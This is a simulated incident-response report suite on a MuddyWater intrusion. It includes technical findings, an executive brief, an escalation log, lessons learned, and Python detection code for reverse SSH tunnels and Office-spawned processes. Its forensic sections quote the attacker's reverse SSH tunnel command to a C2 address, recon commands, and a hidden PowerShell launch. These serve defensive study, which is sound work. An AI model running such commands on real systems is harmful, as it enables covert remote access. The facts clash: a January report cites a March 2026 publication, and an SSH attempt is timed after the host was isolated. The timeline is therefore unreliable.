Operation Coastal Intrusion — Boggy Serpens Campaign Response · January 2026
A full-cycle incident response simulation documenting the detection, investigation, escalation, and remediation of a Boggy Serpens (MuddyWater) intrusion against a simulated energy sector organization. This suite demonstrates the ability to produce all written deliverables a security operations team generates during and after an active incident — adapting format, depth, and language for every audience from technical analysts to executive leadership.
This report documents the full technical investigation of Incident INC-2026-0124, a confirmed Boggy Serpens intrusion detected January 24, 2026, against a simulated energy sector organization. The investigation covers initial detection, forensic analysis, attack chain reconstruction, and containment actions taken.
On January 24, 2026 at approximately 22:00 UTC, a Tier 1 SOC analyst escalated an alert from Cortex XDR flagging anomalous process execution on endpoint WS-ENGR-047, an engineering workstation in the organization's maritime operations division. Initial triage confirmed active attacker presence. The incident was classified Critical and Tier 2 response was activated within 14 minutes of initial detection.
Forensic analysis confirmed the intrusion was conducted by Boggy Serpens (MuddyWater / G0069), an Iranian MOIS-attributed threat actor with a documented mandate to target energy, maritime, and engineering sector organizations consistent with this organization's profile. The attack chain is consistent with TTPs documented in the Unit 42 Boggy Serpens Threat Assessment published March 2026 and the Huntress MuddyWater attack chain analysis of January 2026.
| Field | Value |
|---|---|
| Incident ID | INC-2026-0124 |
| Detection Time | 2026-01-24T22:00:00Z |
| Containment Time | 2026-01-24T23:47:00Z |
| Dwell Time | ~4 hours (estimated initial access 18:00 UTC) |
| Affected Endpoint | WS-ENGR-047 — Engineering Workstation · Windows 11 Pro |
| Affected User | Engineering Department — credentials not confirmed compromised at time of report |
| Threat Actor | Boggy Serpens · MuddyWater · G0069 · Iran MOIS — HIGH CONFIDENCE |
| Attack Vector | Spearphishing attachment — macro-laden Word document via compromised partner account |
| Severity | CRITICAL — Nation-state intrusion · Active C2 tunnel · No lateral movement to other hosts confirmed at containment |
The following timeline was reconstructed from Cortex XDR telemetry, Windows Event Logs, email gateway logs, and network flow data. All timestamps are UTC.
- ~18:00 UTC (estimated): initial access. The macro-laden Word document was opened and its VBA macro wrote FMAPP.exe to `C:\Users\[user]\AppData\Roaming\novaservice.exe`, a file path observed across the Boggy Serpens Phoenix Lineage and UDPGangster toolchains, which share an identical decryption key. FMAPP.exe loaded a malicious DLL establishing the initial implant.
- ~22:00 UTC: detection. Cortex XDR flagged anomalous process execution on WS-ENGR-047 together with an outbound connection to ifconfig[.]me from a workstation with no prior history of either behavior. Alert classified HIGH. Tier 1 analyst escalated to Tier 2 at 22:14 UTC.
- 22:22:03 UTC and 22:26:48 UTC: command and control. The attacker ran `C:\Windows\System32\OpenSSH\ssh.exe -p 22 -o StrictHostKeyChecking=no asuedulimit@162.0.230[.]185 -2 -4 -N -R 10841` through the native Windows OpenSSH client, retrying after the first C2 verification failed. The attacker also ran `tasklist | findstr FMAPP` to verify the implant was running, then connected to ifconfig[.]me to confirm the victim machine's public IP address, standard Boggy Serpens operational security verification behavior.
- 22:23 UTC: endpoint WS-ENGR-047 isolated (23 minutes from detection, per the response metrics).
- 22:31 UTC: network block on 162.0.230[.]185 applied.
- 22:47 UTC: scheduled task and FMAPP.exe removed. No evidence of lateral movement to additional hosts confirmed at time of containment.
- 23:47 UTC: containment confirmed.

| Technique ID | Tactic | Name | Evidence |
|---|---|---|---|
| T1566.001 | Initial Access | Phishing: Spearphishing Attachment | Macro-laden Word document delivered from compromised external partner account |
| T1059.005 | Execution | Visual Basic | VBA macro in Word document dropping FMAPP.exe loader |
| T1053.005 | Persistence | Scheduled Task / Job | Startup scheduled task executing FMAPP.exe on system reboot |
| T1036 | Defense Evasion | Masquerading | novaservice.exe file path; scheduled task name mimicking legitimate service |
| T1572 | Command & Control | Protocol Tunneling | SSH reverse tunnel via native Windows OpenSSH to 162.0.230[.]185 |
| T1016 | Discovery | System Network Configuration Discovery | Connection to ifconfig[.]me to confirm victim public IP address |
| T1057 | Discovery | Process Discovery | tasklist | findstr FMAPP executed to verify implant execution |
```
# 2026-01-24 22:22:03 UTC — First SSH tunnel attempt
C:\Windows\System32\OpenSSH\ssh.exe -p 22 \
    -o StrictHostKeyChecking=no \
    asuedulimit@162.0.230[.]185 \
    -2 -4 -N -R 10841

# 2026-01-24 22:26:48 UTC — Second attempt after initial C2 verification failure
C:\Windows\System32\OpenSSH\ssh.exe -p 22 -o StrictHostKeyChecking=no asuedulimit@162.0.230[.]185 -2 -4 -N -R 10841

# Attacker verification commands (reconstructed from process telemetry)
tasklist | findstr FMAPP
ping 162.0.230[.]185
C:\Windows\System32\OpenSSH\ssh.exe    # re-executed after ping confirmation
```

The flag semantics drive the severity call. `-N` opens the session without requesting a remote command, `-2` and `-4` force SSH protocol 2 over IPv4, and `-o StrictHostKeyChecking=no` suppresses the host key prompt so the command runs unattended. `-R 10841` with a bare port and no `host:hostport` is remote dynamic forwarding (OpenSSH 7.6 and later): the C2 server gets a listener on port 10841 that behaves as a SOCKS proxy, and every connection made through it originates from WS-ENGR-047. The attacker therefore held a pivot into the internal network without any inbound connection for the perimeter to see, which is why the outbound block on 162.0.230[.]185 was part of containment and why any `ssh.exe -R` from a workstation should be treated as high-signal.
| Indicator | Type | Context |
|---|---|---|
| 162.0.230[.]185 | IP (defanged) | SSH C2 server — observed in Huntress MuddyWater investigation January 2026 |
| novaservice.exe | File Path / Name | Shared artifact across Phoenix Lineage and UDPGangster builder tracks |
| FMAPP.exe | Executable | Custom DLL loader — drops malicious DLL establishing implant |
| asuedulimit | SSH Username | C2 tunnel username observed in Huntress analysis |
| ifconfig[.]me | Domain (defanged) | Public IP discovery — attacker operational security verification step |
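The command lines and indicators above can be checked mechanically rather than by eye. The following is an added example, not code from this report or from any vendor product: it parses `ssh.exe` command lines the way ssh(1) does (options before and after the host, attached or detached option values), classifies each `-R` specification as a reverse port forward or a reverse SOCKS proxy, and scores the result against the IOC table. The attacker command line is the one quoted above (defanged, so it is refanged before matching); the administrator command line, the port-forward variant and the scoring weights are constructed for this example.

```python
"""Parse OpenSSH client command lines from process telemetry and flag reverse tunnels.

Added example, not code from the incident report or any vendor product. The
attacker command line is the one quoted in the report (defanged); the two other
command lines and the scoring weights are constructed for this example.
"""
from __future__ import annotations

import shlex
from dataclasses import dataclass, field

_ARG_FLAGS = set("BbcDEeFIiJLlmOopQRSWw")   # ssh(1) options that take an argument
KNOWN_C2 = {"162.0.230.185"}                # from the report's IOC table, refanged


def refang(text: str) -> str:
    return text.replace("[.]", ".")


@dataclass
class SshInvocation:
    target: str | None = None               # [user@]host positional argument
    port: int = 22                          # -p
    no_command: bool = False                # -N: open the tunnel, run nothing
    host_key_check_disabled: bool = False   # -o StrictHostKeyChecking=no
    remote_forwards: list[tuple[str, str]] = field(default_factory=list)  # (-R spec, kind)
    local_forwards: list[str] = field(default_factory=list)               # -L specs

    @property
    def host(self) -> str | None:
        return self.target.rsplit("@", 1)[-1] if self.target else None

    @property
    def user(self) -> str | None:
        return self.target.split("@", 1)[0] if self.target and "@" in self.target else None


def classify_remote_forward(spec: str) -> str:
    """-R [bind:]port:host:hostport exposes one service on the server; -R [bind:]port
    alone is remote dynamic forwarding: the server opens a SOCKS listener whose
    connections originate from the client, i.e. the attacker pivots from the victim."""
    parts = spec.split(":")
    return "remote-dynamic-socks" if len(parts) <= 2 and parts[-1].isdigit() else "remote-port-forward"


def _apply(inv: SshInvocation, flag: str, value: str) -> None:
    if flag == "p" and value.isdigit():
        inv.port = int(value)
    elif flag == "o":
        key, _, val = value.partition("=")
        if key.strip().lower() == "stricthostkeychecking" and val.strip().lower() in {"no", "off"}:
            inv.host_key_check_disabled = True
    elif flag == "R":
        inv.remote_forwards.append((value, classify_remote_forward(value)))
    elif flag == "L":
        inv.local_forwards.append(value)


def parse_ssh_command(cmdline: str) -> SshInvocation:
    toks = shlex.split(cmdline, posix=False)   # posix=False keeps Windows path backslashes
    inv, i = SshInvocation(), 1                # toks[0] is the ssh image path
    while i < len(toks):
        tok = toks[i]
        if tok.startswith("-") and len(tok) > 1:
            flag, rest = tok[1], tok[2:]
            if flag in _ARG_FLAGS:             # value is attached (-p22) or the next token
                _apply(inv, flag, rest or (toks[i + 1] if i + 1 < len(toks) else ""))
                i += 1 if rest else 2
            else:
                inv.no_command |= "N" in tok   # boolean flags may be bundled, e.g. -2N
                i += 1
        elif inv.target is None:
            inv.target, i = tok, i + 1         # ssh still accepts options after the host
        else:
            break                              # remaining tokens form a remote command
    return inv


def assess(cmdline: str) -> dict:
    """Score one ssh.exe command line; weights are assumptions for this example."""
    inv = parse_ssh_command(refang(cmdline))
    findings, score = [], 0
    for spec, kind in inv.remote_forwards:
        if kind == "remote-dynamic-socks":
            score += 4
            findings.append(f"-R {spec}: reverse SOCKS proxy on the remote host, a pivot into this network")
        else:
            score += 3
            findings.append(f"-R {spec}: reverse port forward exposing an internal service")
    if inv.host_key_check_disabled:
        score += 1
        findings.append("StrictHostKeyChecking=no: unattended connection to an unverified host")
    if inv.no_command and inv.remote_forwards:
        score += 1
        findings.append("-N with a remote forward: tunnel-only session, no interactive shell")
    if inv.host in KNOWN_C2:
        score += 5
        findings.append(f"{inv.user or '?'}@{inv.host}: destination matches a known C2 indicator")
    return {"host": inv.host, "reverse_tunnel": bool(inv.remote_forwards),
            "reverse_socks": any(k == "remote-dynamic-socks" for _, k in inv.remote_forwards),
            "score": score, "findings": findings}


# Quoted from the report (defanged).
ATTACKER_CMD = (r"C:\Windows\System32\OpenSSH\ssh.exe -p 22 -o StrictHostKeyChecking=no "
                r"asuedulimit@162.0.230[.]185 -2 -4 -N -R 10841")
# Constructed: a routine admin session with a local forward to an intranet service.
ADMIN_CMD = r"C:\Windows\System32\OpenSSH\ssh.exe -p 22 jdoe@jump.corp.example -L 8443:intranet.corp.example:443"
# Constructed: a reverse port forward exposing this host's RDP port on an unknown server.
PORTFWD_CMD = r"C:\Windows\System32\OpenSSH\ssh.exe -N -R 0.0.0.0:3390:127.0.0.1:3389 ops@203.0.113.10"

if __name__ == "__main__":
    for cmd in (ATTACKER_CMD, ADMIN_CMD, PORTFWD_CMD):
        r = assess(cmd)
        print(f"{r['host']}: score={r['score']} reverse_socks={r['reverse_socks']}")
        for f in r["findings"]:
            print("  -", f)
```

The point of classifying `-R` rather than just matching on `ssh.exe` is that the administrator's `-L` session and the attacker's `-R 10841` look identical to a rule that keys on the image name; the direction and the bare-port form are what separate a jump-host session from a SOCKS pivot.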
Prepared for: Chief Executive Officer, Chief Operating Officer, General Counsel, Board Risk Committee
Classification: Internal · Confidential · TLP:CLEAR (formerly TLP:WHITE; applies to this simulation only)
Date: January 25, 2026
On the evening of January 24, 2026, a state-sponsored Iranian hacking group known as Boggy Serpens successfully compromised one engineering workstation within this organization. The attacker gained access by sending a malicious document disguised as an internal engineering report — delivered from an email address that appeared to belong to a trusted external partner.
Our security operations team detected the intrusion approximately four hours after it began, isolated the affected computer within 23 minutes of detection, and confirmed containment within two hours. There is currently no evidence that sensitive data was copied or transmitted out of the organization. Investigation continues.
Boggy Serpens — also known as MuddyWater — is an Iranian government hacking team that has been active since 2017, targeting energy companies, maritime operators, government ministries, and diplomatic missions across the Middle East, Europe, and the Americas. The group works in service of Iran's Ministry of Intelligence and Security. Their goal in this type of operation is intelligence collection — stealing sensitive documents, monitoring communications, and maintaining long-term hidden access to strategic organizations. Palo Alto Networks Unit 42 published a major threat assessment of this group in March 2026, citing a significant escalation in the sophistication and persistence of their campaigns.
The compromised workstation has been isolated from the network and is undergoing forensic imaging. Engineering operations on other systems were not affected. No systems were encrypted, destroyed, or rendered unavailable. No customer-facing services were disrupted.
The affected workstation had access to engineering documentation related to maritime infrastructure projects. Forensic analysis is ongoing to determine precisely which files the attacker could have accessed during the four-hour dwell period. A definitive data exposure assessment will be provided within 48 hours. General Counsel has been notified and is monitoring regulatory notification obligations.
Depending on the outcome of the data exposure investigation, the organization may have notification obligations under applicable data protection regulations. General Counsel and the privacy team are engaged. No notifications have been issued at this time. A decision point will be reached within 72 hours pending forensic findings.
A sophisticated nation-state attacker successfully compromised one workstation in our engineering division and maintained hidden access for approximately four hours. Our security team detected and contained the intrusion the same evening. There is no evidence of data loss at this time, but investigation continues. The security team is treating this as a high-priority incident and will provide daily updates until the investigation is closed.
The attacker's method — sending a malicious document from a trusted partner's compromised email account — is specifically designed to defeat email controls that judge a message by its sender's reputation. This was not a failure of employee behavior or negligence. It was a technique that exploits human trust in known contacts. The appropriate response is technical: block macro execution by default, alert when Office applications start unexpected programs, enforce phishing-resistant authentication so that our own accounts cannot be taken over and used the same way against our partners, and deploy behavioral email analytics that assess message content rather than sender reputation. Recommendations follow in the Lessons Learned document.
This document records all formal escalations, stakeholder notifications, and decision-point communications during Incident INC-2026-0124. Maintained as the authoritative communication audit trail for post-incident review and potential regulatory review. All timestamps are UTC.
`C:\Users\[user]\AppData\Roaming\novaservice.exe`, a known Boggy Serpens artifact path. Attacker confirmed to have run `tasklist | findstr FMAPP` and `ping 162.0.230[.]185`, indicating active C2 session management. Incident reclassified CRITICAL. Tier 2 analyst and SOC Lead paged via PagerDuty.
| Metric | Time | Target SLA | Status |
|---|---|---|---|
| Time to Detection (from estimated initial access) | ~4 hours | Less than 1 hour (ideal) | Exceeded Target |
| Time from Detection to Tier 2 Escalation | 14 minutes | 30 minutes | Within SLA |
| Time from Detection to Endpoint Isolation | 23 minutes | 30 minutes | Within SLA |
| Time from Detection to Network Blocks | 31 minutes | 30 minutes | Marginally Exceeded |
| Time from Detection to Containment Confirmed | 1 hour 47 min | 2 hours | Within SLA |
| Time from Detection to Executive Notification | 11 hours (next morning) | 4 hours | Exceeded — see Lessons Learned |
Distribution: All Staff · IT and Security Teams · Senior Leadership
Purpose: Organizational learning and process improvement following INC-2026-0124
Date: February 3, 2026
The security team performed well under pressure. These elements of the response should be preserved and strengthened.
| Priority | Action | Owner | Timeline | Expected Impact |
|---|---|---|---|---|
| P1 | Deploy Office macro execution detection rule — alert on any Office process spawning cmd.exe, PowerShell, or non-standard child processes | SOC Engineering | 72 hours | Reduces dwell time for macro-delivered malware from hours to minutes |
| P1 | Block macro execution via Group Policy for all users without documented business requirements | IT Operations | 30 days | Removes the initial access vector used in this incident and in documented Boggy Serpens phishing campaigns |
| P2 | Deploy phishing-resistant MFA on all email accounts — FIDO2 hardware keys for high-value accounts | IT Security | 60 days | Prevents takeover of our own accounts even if credentials are phished, so they cannot be used as a trusted sender against partners or for follow-on access; it does not stop mail from a partner's already compromised mailbox, which the P1 macro controls and P3 email analytics address |
| P2 | Update IR Plan — define 4-hour executive notification SLA for nation-state incidents; update on-call rotation | CISO | 14 days | Closes escalation SLA gap identified in this incident; ensures leadership is informed within regulatory and governance timeframes |
| P3 | Deploy behavioral email analytics assessing thematic anomalies beyond sender reputation | IT Security | 90 days | Provides detection capability against internal account phishing — Boggy Serpens' most evasion-resistant technique |
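The P1 detection rule in the table above, written out as an added example that is not a rule from this report or from Cortex XDR. It evaluates process-creation telemetry for an Office application spawning cmd.exe, PowerShell, or any child outside an expected set, and it walks process ancestry so that a payload launched through an intermediate cmd.exe is still attributed to the Word document. Event records are constructed here in the shape of Sysmon Event ID 1 (pid, ppid, image, command line) and do not reproduce the incident's telemetry; the allowlist of expected Office children and the high-risk child set are assumptions to tune against your own baseline; parent lookup is by pid, so the sample assumes no pid reuse, whereas production telemetry should key on ProcessGuid.

```python
"""Detection rule: Office application spawning cmd.exe, PowerShell, or any
non-standard child process, evaluated over process-creation telemetry.

Added example, not a rule from the report or from Cortex XDR. Events are
constructed in the shape of Sysmon Event ID 1; the allowlist and high-risk
sets are assumptions. Parent lookup is by pid (assumes no pid reuse); real
telemetry should key on ProcessGuid.
"""
from __future__ import annotations

import ntpath
from dataclasses import dataclass

OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe", "mspub.exe"}
# ASSUMPTION: children Office launches in normal use; tune from a clean baseline.
ALLOWED_OFFICE_CHILDREN = {"splwow64.exe"}
HIGH_RISK_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                      "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe", "ssh.exe"}
MAX_DEPTH = 3  # walk up at most this many parents looking for an Office ancestor


@dataclass(frozen=True)
class ProcEvent:
    utc_time: str
    pid: int
    ppid: int
    image: str
    command_line: str


def image_name(path: str) -> str:
    return ntpath.basename(path).lower()


def office_chain(ev: ProcEvent, by_pid: dict[int, ProcEvent], max_depth: int = MAX_DEPTH) -> list[ProcEvent] | None:
    """Return [office_ancestor, ..., ev] if an Office process is within max_depth parents, else None."""
    chain, cur = [ev], ev
    for _ in range(max_depth):
        parent = by_pid.get(cur.ppid)
        if parent is None:
            return None
        chain.append(parent)
        if image_name(parent.image) in OFFICE_IMAGES:
            return list(reversed(chain))
        cur = parent
    return None


def evaluate(events: list[ProcEvent]) -> list[dict]:
    by_pid = {e.pid: e for e in events}
    alerts = []
    for ev in sorted(events, key=lambda e: e.utc_time):
        child = image_name(ev.image)
        if child in OFFICE_IMAGES:
            continue                      # Office launching Office (Outlook -> Word) is not the signal
        chain = office_chain(ev, by_pid)
        if chain is None:
            continue
        # Only a direct, expected child is allowlisted; anything reached through an
        # intermediate process such as cmd.exe is never treated as standard.
        if len(chain) == 2 and child in ALLOWED_OFFICE_CHILDREN:
            continue
        alerts.append({
            "utc_time": ev.utc_time,
            "pid": ev.pid,
            "severity": "high" if child in HIGH_RISK_CHILDREN else "medium",
            "chain": " > ".join(image_name(e.image) for e in chain),
            "command_line": ev.command_line,
        })
    return alerts


# Constructed sample telemetry (not from the incident); paths and arguments are illustrative.
SAMPLE_EVENTS = [
    ProcEvent("2026-01-24 18:00:02", 4100, 900, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent("2026-01-24 18:00:41", 4120, 4100, r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
              r'"WINWORD.EXE" /n "C:\Users\user\Downloads\Engineering_Report.docm"'),
    ProcEvent("2026-01-24 18:00:43", 4133, 4120, r"C:\Windows\splwow64.exe", "splwow64.exe 8192"),
    ProcEvent("2026-01-24 18:00:55", 4140, 4120, r"C:\Windows\System32\cmd.exe",
              r'cmd.exe /c start "" "%APPDATA%\novaservice.exe"'),
    ProcEvent("2026-01-24 18:00:56", 4152, 4140, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -nop -w hidden -f stage.ps1"),
    ProcEvent("2026-01-24 18:00:57", 4160, 4140, r"C:\Users\user\AppData\Roaming\novaservice.exe", "novaservice.exe"),
    ProcEvent("2026-01-24 18:05:10", 5000, 4100, r"C:\Windows\System32\cmd.exe", "cmd.exe"),  # from Explorer: benign
]

if __name__ == "__main__":
    for a in evaluate(SAMPLE_EVENTS):
        print(f"{a['utc_time']} [{a['severity']}] {a['chain']}  ::  {a['command_line']}")
```

Run against the sample, the rule stays silent on Word's print helper and on a cmd.exe started from Explorer, and raises three alerts: the cmd.exe launched by WINWORD.EXE, the PowerShell launched one level down through that cmd.exe, and the unknown executable under `AppData\Roaming`. The ancestry walk is what catches the second and third; a rule that only compares the immediate parent sees `cmd.exe > powershell.exe` and nothing more.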
This incident was a deliberate, targeted attack by a well-resourced nation-state actor with a specific mandate to penetrate maritime and energy sector organizations. The attacker's choice of this organization was not random — it reflects strategic intelligence about this industry and the adversary's operational priorities.
The security team's response was effective and professional. Containment was achieved the same evening. The gaps identified in this review are process and policy gaps, not gaps in analyst competence or platform capability. Closing them systematically over the next 90 days will meaningfully reduce the risk of a similar incident resulting in successful data exfiltration.
Cybersecurity research only protects organizations when the findings reach the right audience in the right format. This suite of documents — the technical investigation, the executive brief, the escalation log, and these lessons learned — represents that principle in practice. Every stakeholder received the information they needed, in the language they could act on.